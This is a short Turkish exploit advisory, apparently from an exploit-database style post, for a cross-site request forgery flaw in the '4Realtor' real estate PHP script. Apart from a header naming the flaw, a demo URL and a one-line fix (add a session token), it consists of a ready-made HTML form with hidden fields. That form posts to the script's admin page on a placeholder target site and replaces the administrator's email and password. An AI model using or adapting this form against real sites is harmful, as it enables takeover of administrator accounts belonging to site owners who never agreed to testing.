< ------------------- header data start ------------------- >

#############################################################

# Application Name : 4Realtor - Real Estate Script

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# Demo : http://realestatephp.com/demo/realestate-admin/realestate.php?mode=admin_list

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form name=user_form action=http://hedefsite.com/scriptyolu/realestate-admin/realestate.php?mode=admin_list method=post onSubmit=return verify_form();>
<input type=hidden name=mode value=admin_list>
<input type=hidden name=step value=process>
<input type=hidden id=email name=email value=[email protected] class=textfield2>
<input type=hidden id=password name=password value=SIFREKOY class=textfield2>
<input type=hidden id=retype_password name=retype_password value=SIFREKOY class=textfield2>
<input type=submit value=BUTONADI class=buttons2>
</form>

< -- bug code end of -- >